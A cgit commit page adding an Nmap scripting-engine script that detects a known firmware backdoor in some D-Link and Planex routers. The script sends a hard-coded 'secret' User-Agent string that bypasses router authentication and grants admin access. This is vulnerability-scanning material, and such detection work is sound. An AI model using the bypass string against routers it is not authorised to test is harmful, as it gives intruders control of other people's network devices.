summaryrefslogtreecommitdiffstats
path: root/scripts/http-dlink-backdoor.nse
diff options
context:
space:
mode:
Diffstat (limited to 'scripts/http-dlink-backdoor.nse')
-rw-r--r--scripts/http-dlink-backdoor.nse70
1 files changed, 70 insertions, 0 deletions
diff --git a/scripts/http-dlink-backdoor.nse b/scripts/http-dlink-backdoor.nse
new file mode 100644
index 0000000..4b8ca55
--- /dev/null
+++ b/scripts/http-dlink-backdoor.nse
@@ -0,0 +1,70 @@
+description = [[
+Detects a firmware backdoor on some D-Link routers by changing the User-Agent
+to a "secret" value. Using the "secret" User-Agent bypasses authentication
+and allows admin access to the router.
+
+The following router models are likely to be vulnerable: DIR-100, DIR-120,
+DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240
+
+In addition, several Planex routers also appear to use the same firmware:
+BRL-04UR, BRL-04CW
+
+Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
+]]
+
+---
+-- @usage
+-- nmap -sV --script http-dlink-backdoor <target>
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 80/tcp open http syn-ack
+-- | http-dlink-backdoor:
+-- | VULNERABLE:
+-- | Firmware backdoor in some models of D-Link routers allow for admin password bypass
+-- | State: VULNERABLE
+-- | Risk factor: High
+-- | Description:
+-- | D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
+-- |
+-- | References:
+-- |_ http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
+---
+
+author = "Patrik Karlsson <patrik@cqure.net>"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln"}
+
+local http = require "http"
+local shortport = require "shortport"
+local string = require "string"
+local vulns = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local response = http.get(host, port, "/", { redirect_ok = false, no_cache = true })
+ local server = response.header and response.header['server'] or ""
+ local vuln_table = {
+ title = "Firmware backdoor in some models of D-Link routers allow for admin password bypass",
+ state = vulns.STATE.NOT_VULN,
+ risk_factor = "High",
+ description = [[
+D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
+]],
+ references = {
+ 'http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/',
+ }
+ }
+ if ( response.status == 401 and server:match("^thttpd%-alphanetworks") ) or
+ ( response.status == 302 and server:match("^Alpha_webserv") ) then
+ response = http.get(host, port, "/", { header = { ["User-Agent"] = "xmlset_roodkcableoj28840ybtide" } })
+
+ if ( response.status == 200 ) then
+ vuln_table.state = vulns.STATE.VULN
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ return report:make_output(vuln_table)
+ end
+ end
+ return
+end
generated by cgit v1.2.3 (git 2.39.1) at 2024-06-12 02:11:49 +0000